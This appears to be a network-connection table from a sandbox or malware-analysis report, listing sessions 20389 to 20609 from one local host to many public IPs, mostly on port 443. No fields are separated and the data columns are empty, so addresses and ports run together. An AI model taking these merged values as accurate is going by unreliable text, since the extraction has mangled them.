                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20389192.168.2.1355958176.201.220.221443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20390192.168.2.134047285.148.93.44443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20391192.168.2.1354738169.45.198.60443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20392192.168.2.1359284131.18.118.123443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20393192.168.2.133310096.40.168.141443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20394192.168.2.134060427.134.156.61443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20395192.168.2.135578250.229.13.91443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20396192.168.2.134281459.193.147.150443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20397192.168.2.1344098104.173.249.227443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20398192.168.2.1346548217.62.105.164443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20399192.168.2.1353944165.94.21.18443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20400192.168.2.133288249.187.100.56443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20401192.168.2.133833839.242.101.49443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20402192.168.2.135321623.124.4.45443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20403192.168.2.1340314174.187.157.36443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20404192.168.2.133566254.235.71.218443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20405192.168.2.135170260.181.243.128443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20406192.168.2.1344482174.172.106.223443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20407192.168.2.135720218.52.224.224443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20408192.168.2.134695018.176.161.101443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20409192.168.2.1355248191.145.69.64443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20410192.168.2.1342628212.7.16.228443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20411192.168.2.1345664179.146.219.10443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20412192.168.2.134166870.142.55.42443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20413192.168.2.1344070217.52.178.99443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20414192.168.2.1344410208.15.205.83443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20415192.168.2.1357330161.169.209.71443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20416192.168.2.1349572136.93.17.78443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20417192.168.2.133680078.20.154.53443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20418192.168.2.1344620150.112.31.52443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20419192.168.2.134130638.253.250.111443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20420192.168.2.1349512113.57.112.78443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20421192.168.2.1344934192.164.201.65443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20422192.168.2.133761843.100.171.44443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20423192.168.2.135203465.37.232.202443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20424192.168.2.134235862.41.70.165443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20425192.168.2.135507668.63.46.179443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20426192.168.2.1349558123.13.43.41443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20427192.168.2.135463840.239.229.237443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20428192.168.2.134012877.48.62.167443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20429192.168.2.1336042199.163.41.211443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20430192.168.2.135151052.11.158.46443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20431192.168.2.1337234144.46.205.28443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20432192.168.2.135906677.180.126.29443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20433192.168.2.135748279.237.86.207443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20434192.168.2.1337124218.2.252.218443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20435192.168.2.133688672.255.163.146443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20436192.168.2.1360988177.226.108.135443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20437192.168.2.1337732190.156.209.218443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20438192.168.2.1347298167.237.199.97443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20439192.168.2.1360396123.2.89.75443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20440192.168.2.1340238195.9.247.99443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20441192.168.2.1348790163.91.10.39443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20442192.168.2.1359368105.54.226.21443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20443192.168.2.133361676.133.197.218443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20444192.168.2.13510889.140.9.219443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20445192.168.2.1343728147.61.13.186443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20446192.168.2.134999067.1.94.250443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20447192.168.2.133301635.184.141.75443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20448192.168.2.1335402166.227.37.10443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20449192.168.2.1349636117.191.27.231443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20450192.168.2.134286489.68.182.213443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20451192.168.2.1333984107.112.216.125443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20452192.168.2.1348462157.18.52.41443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20453192.168.2.1333080199.145.123.29443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20454192.168.2.1343660102.157.255.226443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20455192.168.2.133497462.172.182.119443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20456192.168.2.1341346205.223.243.21443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20457192.168.2.1333836113.50.126.12443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20458192.168.2.133597245.28.246.242443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20459192.168.2.1332956165.78.34.132443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20460192.168.2.1345986211.23.95.138443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20461192.168.2.135556263.64.196.243443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20462192.168.2.133686447.24.239.180443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20463192.168.2.134799099.160.167.1443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20464192.168.2.13500345.34.131.43443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20465192.168.2.1357954192.92.80.185443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20466192.168.2.1359144186.72.221.15443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20467192.168.2.1333368184.66.123.63443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20468192.168.2.1342068115.108.248.225443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20469192.168.2.1352708171.93.113.181443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20470192.168.2.1342384191.90.46.73443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20471192.168.2.1349616167.29.169.33443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20472192.168.2.135923691.126.179.187443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20473192.168.2.135243476.232.197.80443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20474192.168.2.13441801.80.153.32443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20475192.168.2.1352946156.217.131.34443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20476192.168.2.133817057.104.242.13443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20477192.168.2.1333096108.255.150.178443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20478192.168.2.1351132136.105.248.194443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20479192.168.2.133907814.154.23.101443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20480192.168.2.1333708159.215.207.8443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20481192.168.2.1339138192.254.5.140443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20482192.168.2.135939674.177.183.247443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20483192.168.2.135232623.32.57.136443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20484192.168.2.1353320133.87.119.171443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20485192.168.2.1341720179.46.241.143443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20486192.168.2.134887862.188.85.123443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20487192.168.2.1351222170.79.218.237443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20488192.168.2.1356158144.1.153.3443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20489192.168.2.1340422148.70.156.19443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20490192.168.2.1355560150.20.215.38443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20491192.168.2.1357570221.127.116.231443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20492192.168.2.135246278.163.72.220443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20493192.168.2.1349624204.113.92.220443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20494192.168.2.134889844.75.31.228443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20495192.168.2.1346566108.248.255.207443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20496192.168.2.1339566150.217.74.140443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20497192.168.2.1341824169.146.102.145443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20498192.168.2.134279074.7.190.187443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20499192.168.2.135154819.42.70.145443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20500192.168.2.1340328141.162.178.24443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20501192.168.2.1355508134.214.55.237443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20502192.168.2.134765095.21.170.0443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20503192.168.2.1343658198.155.207.203443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20504192.168.2.133626660.138.221.29443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20505192.168.2.135460679.57.205.33443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20506192.168.2.1335814211.139.110.205443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20507192.168.2.133605241.63.122.212443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20508192.168.2.135645659.30.177.206443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20509192.168.2.1355670124.226.62.115443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20510192.168.2.1333120150.170.148.238443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20511192.168.2.1353190145.12.60.247443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20512192.168.2.1339942188.88.57.204443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20513192.168.2.133680090.69.223.10443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20514192.168.2.135909291.217.143.232443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20515192.168.2.1343338111.247.246.11443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20516192.168.2.1349860174.20.196.184443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20517192.168.2.1337634151.183.233.97443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20518192.168.2.13329608.44.120.144443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20519192.168.2.134844493.80.82.23443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20520192.168.2.1339494172.178.63.37443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20521192.168.2.135175264.50.38.23443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20522192.168.2.133821669.180.31.156443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20523192.168.2.134767076.36.131.178443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20524192.168.2.1351002136.172.42.0443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20525192.168.2.1347554206.30.186.75443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20526192.168.2.1335116153.162.137.203443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20527192.168.2.1339314115.101.183.55443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20528192.168.2.13551024.243.169.191443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20529192.168.2.1349684180.223.229.157443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20530192.168.2.1340206137.143.33.196443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20531192.168.2.134902279.118.35.203443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20532192.168.2.135965273.47.63.52443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20533192.168.2.134602435.125.58.220443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20534192.168.2.1343088143.142.229.184443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20535192.168.2.1340524217.205.142.100443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20536192.168.2.1342302221.217.252.189443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20537192.168.2.135879498.22.238.232443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20538192.168.2.1358650150.215.1.2443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20539192.168.2.1335908169.139.85.209443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20540192.168.2.1333162145.229.80.159443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20541192.168.2.133956049.5.60.3443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20542192.168.2.1340410178.92.201.208443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20543192.168.2.1337846150.120.12.66443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20544192.168.2.1343136144.92.153.117443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20545192.168.2.134276449.223.99.21443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20546192.168.2.1344848126.0.35.56443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20547192.168.2.1360118199.24.208.173443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20548192.168.2.1337578168.216.75.196443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20549192.168.2.1349936179.56.146.65443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20550192.168.2.1343958202.187.212.103443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20551192.168.2.1339922129.244.192.147443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20552192.168.2.133393685.250.162.169443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20553192.168.2.1344062101.174.49.70443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20554192.168.2.1340470217.143.30.195443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20555192.168.2.135391257.223.239.211443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20556192.168.2.133356270.166.131.28443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20557192.168.2.133751814.249.126.23443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20558192.168.2.135727677.203.195.2443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20559192.168.2.136006252.76.148.23443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20560192.168.2.133706212.37.197.249443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20561192.168.2.1333994149.68.191.204443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20562192.168.2.1357890141.96.249.1443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20563192.168.2.135333077.26.32.12443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20564192.168.2.133801436.218.200.121443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20565192.168.2.1335404102.201.203.49443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20566192.168.2.135840079.223.186.108443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20567192.168.2.133360676.31.132.100443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20568192.168.2.1357138205.96.211.100443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20569192.168.2.134367850.153.38.2443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20570192.168.2.1338744169.110.229.204443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20571192.168.2.1356790212.99.16.142443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20572192.168.2.134075692.107.115.112443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20573192.168.2.13455741.246.10.54443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20574192.168.2.1351236146.139.65.111443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20575192.168.2.1347492177.98.80.246443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20576192.168.2.1336208198.171.254.8443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20577192.168.2.135693450.255.46.179443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20578192.168.2.1350234213.16.156.32443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20579192.168.2.1342856183.237.224.208443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20580192.168.2.1334854113.211.50.157443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20581192.168.2.1337496200.165.174.196443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20582192.168.2.1347410181.176.234.136443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20583192.168.2.1332846111.34.14.107443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20584192.168.2.1333578179.90.149.110443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20585192.168.2.135437886.124.188.23443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20586192.168.2.133322642.93.126.60443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20587192.168.2.135730051.16.126.38443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20588192.168.2.134211240.136.242.57443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20589192.168.2.1360456183.87.208.49443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20590192.168.2.135448419.25.150.130443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20591192.168.2.1347744197.121.19.221443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20592192.168.2.134100831.222.22.193443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20593192.168.2.1338866193.43.174.241443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20594192.168.2.1332826157.207.231.251443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20595192.168.2.1344728183.182.233.97443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20596192.168.2.1337738126.160.146.18443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20597192.168.2.135023679.45.201.220443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20598192.168.2.135223466.35.122.1058080
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20599192.168.2.1342748167.60.84.142443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20600192.168.2.1347136219.136.50.115443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20601192.168.2.1335762132.155.75.96443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20602192.168.2.1335710169.122.86.107443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20603192.168.2.1338740138.128.181.150443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20604192.168.2.1336482210.103.44.72443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20605192.168.2.1352272169.251.148.54443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20606192.168.2.1348640128.22.79.83443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20607192.168.2.1352456133.238.47.214443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20608192.168.2.1351982131.130.92.211443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20609192.168.2.1355290191.102.12.117443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
